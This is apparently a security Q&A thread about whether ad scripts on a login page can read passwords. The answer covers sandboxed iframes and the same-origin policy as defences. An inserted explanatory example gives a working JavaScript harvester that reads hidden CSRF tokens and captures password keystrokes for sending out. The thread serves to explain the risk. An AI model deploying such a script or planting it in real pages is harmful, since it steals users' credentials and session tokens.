What prevents ads from reading my password as I type it?
Disclaimer: I have minimal web-dev/security knowledge, so please answer with this in mind.
I've heard that web advertisements need to be able to run their own JavaScript so that they can verify they're being viewed by "real users." As this incident on StackOverflow shows, they're basically given free rein.
I also know that JavaScript can be used to capture keystrokes on a webpage.
So if an ad is placed on a login page, is there something in place to prevent the ad from reading keystrokes to record my credentials? Is reading keystrokes simply not possible from an ad?
If I see ads on a login page, should I assume that the page is not safe to enter my credentials?
Tags: passwords, web-application
asked 9 hours ago by scohe001, edited 4 hours ago
It's worse than that. Web performance tools and similar not only read your credentials, but they read the credentials you type and then delete. Very nasty. You might be able to get away with not typing, always pasting your credentials. But the JavaScript has access to your DOM, so it can just read every element. The only way to stop that is not to use credentials but to use OAuth and hand your life over to Google. What could go wrong.
– Unicorn Tears
9 hours ago
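As an added example (not part of the original question or its comments), here is what a third-party script that runs in the page's main JavaScript scope can do once it is there: read hidden fields such as anti-CSRF tokens, and watch a password field keystroke by keystroke, which is why typing a password and then deleting it does not help. `FakeInput` and `FakeDocument` are a constructed stand-in for the few DOM methods the script uses so that it runs under Node; in a browser the same `installHarvester` would simply be handed the real `document`. The form fields, the token value and the `exfil` sink are assumptions made for the illustration.

```javascript
// Added example, not code from the original post. A stand-in DOM is
// constructed below so the script runs under Node; in a browser the same
// installHarvester() would simply receive the real `document`.

// ---- constructed stand-in for the DOM methods the harvester touches ----
class FakeInput {
  constructor(type, name, value = '') {
    this.type = type;
    this.name = name;
    this.value = value;
    this.listeners = {};
  }
  addEventListener(event, fn) {
    (this.listeners[event] = this.listeners[event] || []).push(fn);
  }
  fire(event) {
    for (const fn of this.listeners[event] || []) fn({ target: this });
  }
  // The user types one character: the value grows and "input" fires.
  typeChar(ch) { this.value += ch; this.fire('input'); }
  // The user selects all and deletes: "input" fires again.
  clear() { this.value = ''; this.fire('input'); }
}

class FakeDocument {
  constructor(inputs) { this.inputs = inputs; }
  // Supports only the attribute selectors used below.
  querySelectorAll(selector) {
    const m = /^input\[type=(\w+)\]$/.exec(selector);
    if (!m) throw new Error('stand-in does not support selector: ' + selector);
    return this.inputs.filter(i => i.type === m[1]);
  }
}

// ---- the "ad" script: same scope, same powers as the site's own code ----
// `exfil` is a hypothetical sink; a real script would call fetch() or
// navigator.sendBeacon() to a host the attacker controls.
function installHarvester(doc, exfil) {
  // 1. Read what is already in the page, e.g. hidden anti-CSRF tokens.
  for (const el of doc.querySelectorAll('input[type=hidden]')) {
    exfil({ kind: 'hidden', name: el.name, value: el.value });
  }
  // 2. Watch every password field keystroke by keystroke, so a password
  //    that is typed and then deleted before submit is captured anyway.
  for (const el of doc.querySelectorAll('input[type=password]')) {
    el.addEventListener('input', ev => {
      exfil({ kind: 'password', name: ev.target.name, value: ev.target.value });
    });
  }
}

// Scenario: a login form with a CSRF token (constructed sample values).
// Returns everything the harvester managed to capture.
function runScenario() {
  const captured = [];
  const doc = new FakeDocument([
    new FakeInput('text', 'username'),
    new FakeInput('password', 'password'),
    new FakeInput('hidden', '_csrf', 'tok-9f3a'),
  ]);
  installHarvester(doc, record => captured.push(record));

  const pw = doc.querySelectorAll('input[type=password]')[0];
  for (const ch of 'hunter2') pw.typeChar(ch);
  pw.clear(); // the user changes their mind and never submits: too late
  return captured;
}

console.log(runScenario());
```

Nothing in the browser distinguishes `installHarvester` from the site's own form-validation code: both are plain scripts in the same origin with the same `document`. That is the whole point of the answer below about sandboxed iframes and separate origins.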
1 Answer
Nothing prevents ads from reading your passwords.
Ads (or any other script, like analytics or JavaScript libraries) have access to the main JavaScript scope and are able to read a lot of sensitive stuff: financial information, passwords, CSRF tokens, etc.
Well, unless they're being loaded in a sandboxed iframe.
Loading an ad in a sandboxed iframe adds security restrictions to the JavaScript scope it has access to, so it won't be able to do nasty stuff.
Unfortunately, most third-party scripts are not sandboxed. This is because some of them require access to the main scope to work properly, so they're almost never sandboxed.
As a developer, what can I do?
Since any third-party script could compromise the security of all your personal data, all sensitive pages (like login forms or checkout pages) should be loaded on their own origin (a subdomain is fine).
Using another origin allows us to profit from the Same-Origin Policy.
Note: Content Security Policy and Subresource Integrity could also be used if the third party can be easily reviewed, but most ad networks couldn't work anymore if you used them.
answered 9 hours ago by Benoit Esnard (9,942 rep; 6 gold, 51 silver, 56 bronze badges), edited 4 hours ago
Is there some way a layman like me could tell the difference between a sandbox'ed ad vs. a non-sandbox'ed ad?
– scohe001
9 hours ago
1
@scohe001: Do you know how to use the "Inspect element" tool in your browser? A sandboxed iframe has a "sandbox" attribute. I don't know any easy way to check this without any HTML knowledge unfortunately. :(
– Benoit Esnard
9 hours ago
@scohe001 This Stylus usersheet will put a super-annoying border around unsandboxed iframes and sandboxed iframes that can run scripts:

iframe:not([sandbox]),
iframe[sandbox~=allow-scripts] {
  border: 10px solid red !important;
  border-image: repeating-linear-gradient(45deg, red, red 5%, #ff0 5%, #ff0 10%) 10 !important;
}

– AuxTaco
9 mins ago